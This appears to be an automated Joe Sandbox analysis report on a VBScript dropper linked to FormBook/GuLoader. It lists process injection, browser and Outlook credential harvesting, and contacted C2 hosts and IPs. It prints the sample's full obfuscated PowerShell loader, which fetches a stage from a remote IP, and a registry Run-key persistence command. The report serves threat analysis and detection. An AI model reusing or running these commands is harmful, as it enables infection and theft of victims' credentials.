Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$retorsionshandlingenllustrationer = 1;$elytrigerous='s';$elytrigerous+='ubstrin';$elytrigerous+='g';function programregningsfunktionens($ridderne){$retorsionshandlingennfraocular=$ridderne.length-$retorsionshandlingenllustrationer;for($retorsionshandlingen=5; $retorsionshandlingen -lt $retorsionshandlingennfraocular; $retorsionshandlingen+=(6)){$outsmokes+=$ridderne.$elytrigerous.invoke( $retorsionshandlingen, $retorsionshandlingenllustrationer);}$outsmokes;}function gracy216($begrendes){. ($antediluvianske) ($begrendes);}$diskoskasteren=programregningsfunktionens 's.perm l deolandszaccomiturbolbrystlsu.loa inte/linje5.ilfo.brneb0b,ddi illi(mamelwkortsiexoranbowkndsp,dho.urvew,ndtrsfjase utotnmileptb,een marga1san.u0balli.montr0h,rsk;.ykke brakpwxanthi ,ervnreprs6trova4filet;d,awc vidnxt,gue6admin4cotra;insci un btrtogstvegipt:inter1riv l2for e1 daun. gens0sknde)neutr trak grepudeguldkc belaktandlov.rde/ edb2uheld0sknhe1elek.0nell,0 ,rot1un,en0skibi1savne mordfautogiko,merde,inearom,fshipbohapaxxstork/inten1splas2ds,es1 ilsk.fylds0capri ';$sprayens=programregningsfunktionens 'nondeu rubasva neebe,kir for -,geblar.bbegholose ta dn paratprivi ';$reprogrammes=programregningsfunktionens 'stuf.hl.muctversit subspcosmo:etcif/taksa/ impl8morph7far,n.bronz1anal,2proc,1ungl .unpol1unper0f,nda5varmt. gr,n5roc,e4,sent/seksaooverrmmismamt.bulelandlsforcetmis,aratropudiscop,iske.aarsadunsanesaanipbrodfldiameonamatysawai ';$kretidseffekternes=programregningsfunktionens 'vejkr>phisa ';$antediluvianske=programregningsfunktionens 'etam.iraadie saddxfasts ';$gunlaying='forraadnelig';gracy216 (programregningsfunktionens ' l urs atikesignatrecon- genecpen,eo.endrnnovumtprintelailanporphtst ir peatw-anglopobitaa elvetsymbohp,esh trvemt,ough: ,aad\ afv i cerid.roldrcheskt udpasfilerfmenneo c,lorsol,cesuavenphaneiindlenaabengseepssunche1pre i9wi,db7super.radiotniveax t rrt duod evole-un mmv selramoraklpericuunmoueadvoc melle$samstg estiu appenre,orl teleaanmrkysaponiimmunn behvgah.eh;chabo ');gracy216 (programregningsfunktionens ' framihabi,fcacos larit( grectv.stfe.olfistalertridge-ozonopju iaastoddttabarhpigl, pse thaand:mosen\kompli .oemd ilker tigeteperoskrig,f collopl.udr subsemad lnnonmoikromgnenok g saxoshaand1 twir9op oe7 lov..fedtst an txfarvet rede) rtss{ ka.me kropxfaksiiudsket sang} un s; gro, ');$kvrne = programregningsfunktionens 'nedraeunconcuan.ghpet oopaatn munke%kys.eacasanpfy,depsixpedover agravit orema ragl%euboe\devels lovgalaa,ngplat snematgbug.gn jalaitegninovercgarbe.esl,knr forsn p.ileafsvo. unshispirinm larth ved .fsla&neonr&be.ri adiabetro ecudganhsvovloeksp trink$ambol ';gracy216 (programregningsfunktionens 'slide$svmnigimperlavn,sot aadb rag,apie alfordr: demivgoogoiquittrshop k trknsmycetofodbomhomemhdr sieeffemd de,isdawsst bf eyoprikpbrancepatrunsongbs thri=nonam(am.utcpillamsulted stev toksi/ ilhecrajah bed
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (9 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeIn formation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid (per-installation GUID, commonly read to derive a stable host identifier)

        Stealing of Sensitive Information

Source: Yara match | File source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\xcopy.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
(xcopy.exe here is a host for injected code: the behavior graph shows it started by the injected TsrCaEwNrfOKANGWcsg.exe process and itself injecting into a further TsrCaEwNrfOKANGWcsg.exe instance, so the browser-database and Outlook-profile reads above are the injected payload's credential harvesting, not anything xcopy does on its own. Any detection keyed on "xcopy.exe reads Login Data / Cookies" should therefore be treated as a process-hollowing indicator, with the real image identified from memory rather than from the process name.)

        Remote Access Functionality

Source: Yara match | File source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one line per tactic; a number in brackets is the hit badge the report attaches to a technique it observed, the remaining entries are the unmatched cells of the report's matrix template)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: [221] Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: [1] Windows Management Instrumentation; [1] Exploitation for Client Execution; [11] Command and Scripting Interpreter; [2] PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: [221] Scripting; [1] DLL Side-Loading; [11] Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: [1] Abuse Elevation Control Mechanism; [1] DLL Side-Loading; [311] Process Injection; [11] Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: [1] Deobfuscate/Decode Files or Information; [1] Abuse Elevation Control Mechanism; [4] Obfuscated Files or Information; [1] Software Packing; [1] DLL Side-Loading; [1] Masquerading; [1] Modify Registry; [131] Virtualization/Sandbox Evasion; [311] Process Injection; [1] Rundll32
Credential Access: [1] OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: [2] File and Directory Discovery; [15] System Information Discovery; [1] Query Registry; [121] Security Software Discovery; [1] Process Discovery; [131] Virtualization/Sandbox Evasion; [1] Application Window Discovery; [1] Remote System Discovery; [1] System Network Configuration Discovery; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: [1] Archive Collected Data; [1] Data from Local System; [1] Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: [1] Ingress Tool Transfer; [1] Encrypted Channel; [2] Non-Application Layer Protocol; [2] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1435413 | Sample: 01105751.vbs | Startdate: 02/05/2024 | Architecture: WINDOWS | Score: 100
Contacted hosts: www.facesofhoustontx.com; timesrenewables.com; 3 other IPs or domains
Sample-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 4 other signatures

Process tree (graph node numbers in brackets; "injected" marks a process the parent wrote code into rather than started):
wscript.exe [12]: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 4 other signatures
  powershell.exe [21]: 87.121.105.54 (ports 49713, 49721, 80; NET1-ASBG Bulgaria); Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
    powershell.exe [31]: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Hides threads from debuggers
      wab.exe [44]: Maps a DLL or memory area into another process; Hides threads from debuggers
        TsrCaEwNrfOKANGWcsg.exe [49] (injected): Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
          xcopy.exe [54]: Tries to steal Mail credentials (via file / registry access); Creates multiple autostart registry keys; Tries to harvest and steal browser information (history, passwords, etc); 2 other signatures
            TsrCaEwNrfOKANGWcsg.exe [61] (injected): www.facesofhoustontx.com 34.174.122.2 (ports 49725, 80; ATGS-MMD-ASUS United States); Found direct / indirect Syscall (likely to bypass EDR)
            firefox.exe [65]
        cmd.exe [52]
          reg.exe [57]
          conhost.exe [59]
      cmd.exe [47]
    conhost.exe [34]
    cmd.exe [36]
  PING.EXE [25]: google.com 142.251.40.206 (GOOGLEUS United States)
    conhost.exe [38]
  cmd.exe [27]
    conhost.exe [40]
  PING.EXE [29]
    conhost.exe [42]
wab.exe [15]
rundll32.exe [17]
wab.exe [19]

Antivirus detection (Source | Detection | Scanner | Label)
01105751.vbs | 3% | ReversingLabs | Win32.Dropper.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
URL reputation (Source | Detection | Scanner | Label)
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://87.121.105.54 | 0% | Avira URL Cloud | safe
http://87.121.105.54/Ommestrup.deploy | 0% | Avira URL Cloud | safe
http://87.121.105.54/iYbZIhIVLPBjJUzImyrJN72.bin | 0% | Avira URL Cloud | safe
http://www.facesofhoustontx.com/gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I= | 0% | Avira URL Cloud | safe
http://87.121.H | 0% | Avira URL Cloud | safe
http://87.121.105.54/Ommestrup.deployP | 0% | Avira URL Cloud | safe
(The pesterbdd.com, contoso.com and go.micro entries were found as strings in powershell.exe memory, not in the sample's traffic: they are the familiar manifest strings of PowerShell modules present on the analysis host (Pester's manifest points at pesterbdd.com, the contoso.com placeholders come with PowerShellGet/PackageManagement), and none of them appears in the DNS or connection records. The 100% "malware" verdict on Pester.png is a reputation false positive, not an IOC for this sample. Conversely, the "safe" verdicts on the 87.121.105.54 paths are reputation lookups only; the PowerShell stage decodes and contacts that host.)
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | - | unknown
google.com | 142.251.40.206 | true | false | - | high
www.facesofhoustontx.com | 34.174.122.2 | true | true | - | unknown
timesrenewables.com | 3.33.130.190 | true | true | - | unknown
www.timesrenewables.com | unknown | unknown | false | - | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://87.121.105.54/iYbZIhIVLPBjJUzImyrJN72.bin | false | Avira URL Cloud: safe | unknown
http://www.facesofhoustontx.com/gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I= | true | Avira URL Cloud: safe | unknown
http://87.121.105.54/Ommestrup.deploy | false | Avira URL Cloud: safe | unknown
(The two 87.121.105.54 paths are the stage-download URLs: the PowerShell stage decodes http://87.121.105.54/Ommestrup.deploy from its own command line, and the behavior graph shows powershell.exe [21] connecting to 87.121.105.54 on port 80. Treat them as IOCs regardless of the verdicts here; "Avira URL Cloud: safe" and Malicious=false reflect vendor reputation lookups, not the observed behavior.)
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://87.121.105.54 | powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3288836081.000001EF2AE16000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000008.00000002.3288836081.000001EF2A2CC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.3288836081.000001EF28DD1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.3288836081.000001EF28DD1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://87.121.H | powershell.exe, 00000008.00000002.3288836081.000001EF2AFCA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://87.121.105.54/Ommestrup.deployP | powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.251.40.206 | google.com | United States | 15169 | GOOGLEUS | false
34.174.122.2 | www.facesofhoustontx.com | United States | 2686 | ATGS-MMD-ASUS | true
87.121.105.54 | unknown | Bulgaria | 43561 | NET1-ASBG | false
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1435413
                              Start date and time:2024-05-02 17:12:06 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 47s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:26
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:01105751.vbs
                              renamed because original name is a hash value
                              Original Sample Name: _20240501105751.vbs
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winVBS@33/10@3/3
                              EGA Information:
                              • Successful, ratio: 40%
                              HCA Information:
                              • Successful, ratio: 91%
                              • Number of executed functions: 168
                              • Number of non-executed functions: 93
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 199.232.214.172, 23.33.40.15, 23.33.40.7, 23.33.40.14, 23.33.40.26, 23.33.40.12, 23.33.40.13, 23.33.40.11, 23.33.40.19, 23.33.40.24
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                              • Execution Graph export aborted for target TsrCaEwNrfOKANGWcsg.exe, PID 4092 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 5692 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 6096 because it is empty
                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: 01105751.vbs
Time | Type | Description
17:13:02 | API Interceptor | 1x Sleep call for process: wscript.exe modified
17:13:08 | API Interceptor | 84x Sleep call for process: powershell.exe modified
17:14:07 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Achaque %Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)
17:14:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Achaque %Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)
17:14:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VLGXKP5HJL C:\Program Files (x86)\windows mail\wab.exe
17:15:03 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VLGXKP5HJL C:\Program Files (x86)\windows mail\wab.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
34.174.122.2 | confirmation de cuenta.exe | malicious | FormBook, GuLoader | www.facesofhoustontx.com/op6t/
34.174.122.2 | FV- 12.429#U00a0TUSOCAL.exe | malicious | FormBook, GuLoader | www.facesofhoustontx.com/op6t/
34.174.122.2 | FV- 12.429#U00a0TUSOCAL.exe | malicious | FormBook, GuLoader | www.facesofhoustontx.com/op6t/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.facesofhoustontx.com | confirmation de cuenta.exe | malicious | FormBook, GuLoader | 34.174.122.2
www.facesofhoustontx.com | FV- 12.429#U00a0TUSOCAL.exe | malicious | FormBook, GuLoader | 34.174.122.2
www.facesofhoustontx.com | FV- 12.429#U00a0TUSOCAL.exe | malicious | FormBook, GuLoader | 34.174.122.2
bg.microsoft.map.fastly.net | DHL0000879654982647865424.vbs | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdf | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://www.opustrustweb.com/EmailTrackerAPI/open?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..62tVk07eUS1tgkfaDkQOqQ.nL-JZjGlYSBu9AibCOqK7-wJ7VXqjfoMrgeXwHgP6tLPx4s2jjofEWjZh794Ex5FiocFlK50_YxzembNjUsYkjIjaFyaIpNIDSPFE46cBlrxNy-t9VcCVcfKZphrojE0.AXzXZielor8D6px-r_wTOg&url=https://minicursodamariana.fun/nu/slceitil@emfa.pt | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | http://collectionsystem.veconinter.com:8002/Default.aspx?Pais=TMVb4l9krDsyWtcOACvZcw==&Tipo=5vw2xkejLdEpXNK8ckiYpA==&Val=Ju61jJ3lX3gIjnPLX+eDdQ==&Id=3243049&VR=1 | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://flow.page/efraudprevention.com | malicious | HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | swift copy.exe | malicious | AgentTesla, PureLog Stealer | 199.232.214.172
bg.microsoft.map.fastly.net | Notice.xls | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | D6OzFk32fU9xCHV.exe | malicious | AgentTesla, PureLog Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | MehGCkAdgaX9oF0.exe | malicious | AgentTesla, PureLog Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | https://www.multipli.com.au | malicious | Unknown | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ATGS-MMD-ASUS | https://www.opustrustweb.com/EmailTrackerAPI/open?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..62tVk07eUS1tgkfaDkQOqQ.nL-JZjGlYSBu9AibCOqK7-wJ7VXqjfoMrgeXwHgP6tLPx4s2jjofEWjZh794Ex5FiocFlK50_YxzembNjUsYkjIjaFyaIpNIDSPFE46cBlrxNy-t9VcCVcfKZphrojE0.AXzXZielor8D6px-r_wTOg&url=https://minicursodamariana.fun/nu/slceitil@emfa.pt | malicious | HTMLPhisher | 34.36.216.150
ATGS-MMD-ASUS | c8sDO7umrx.exe | malicious | CMSBrute | 57.128.101.155
ATGS-MMD-ASUS | https://herozheng.com/ | malicious | Unknown | 57.180.119.211
ATGS-MMD-ASUS | aduLTc2Dny.elf | malicious | Mirai | 34.24.22.186
ATGS-MMD-ASUS | saq4WWKA5B.elf | malicious | Mirai | 57.255.10.217
ATGS-MMD-ASUS | hCwh5R02fs.elf | malicious | Mirai | 57.146.140.194
ATGS-MMD-ASUS | p67UidesWn.elf | malicious | Mirai | 57.244.211.119
ATGS-MMD-ASUS | https://xdywna.com/ | malicious | Unknown | 57.180.70.0
ATGS-MMD-ASUS | https://www.soqsrkk.cn/ | malicious | Unknown | 57.180.70.0
ATGS-MMD-ASUS | https://2625819278.org/MIg2p2 | malicious | HTMLPhisher | 34.149.254.14
NET1-ASBG | Aqua.x86-20240502-1008.elf | malicious | Unknown | 94.156.79.215
NET1-ASBG | Aqua.arm7-20240502-1008.elf | malicious | Mirai | 94.156.79.215
NET1-ASBG | yibSQnyAI7.elf | malicious | Mirai, Okiru | 93.123.85.46
NET1-ASBG | ryOgrdefvB.elf | malicious | Mirai, Okiru | 93.123.85.46
NET1-ASBG | kdTZ0vraR2.elf | malicious | Mirai, Okiru | 93.123.85.46
NET1-ASBG | jj5TL5MXzK.elf | malicious | Mirai, Okiru | 93.123.85.46
NET1-ASBG | file.exe | malicious | GuLoader, PXRECVOWEIWOEI Stealer | 94.156.79.214
NET1-ASBG | PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta | malicious | GuLoader, Remcos | 87.121.105.163
NET1-ASBG | 831107010C8578AD95A12C5498B03755EAC398B5BBC0D.exe | malicious | RisePro Stealer | 94.156.8.188
NET1-ASBG | installerwn.exe | malicious | PureLog Stealer, zgRAT | 94.156.8.189
                              No context
                              No context
                              Process:C:\Windows\System32\wscript.exe
                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                              Category:dropped
                              Size (bytes):69993
                              Entropy (8bit):7.99584879649948
                              Encrypted:true
                              SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                              MD5:29F65BA8E88C063813CC50A4EA544E93
                              SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                              SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                              SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                              Malicious:false
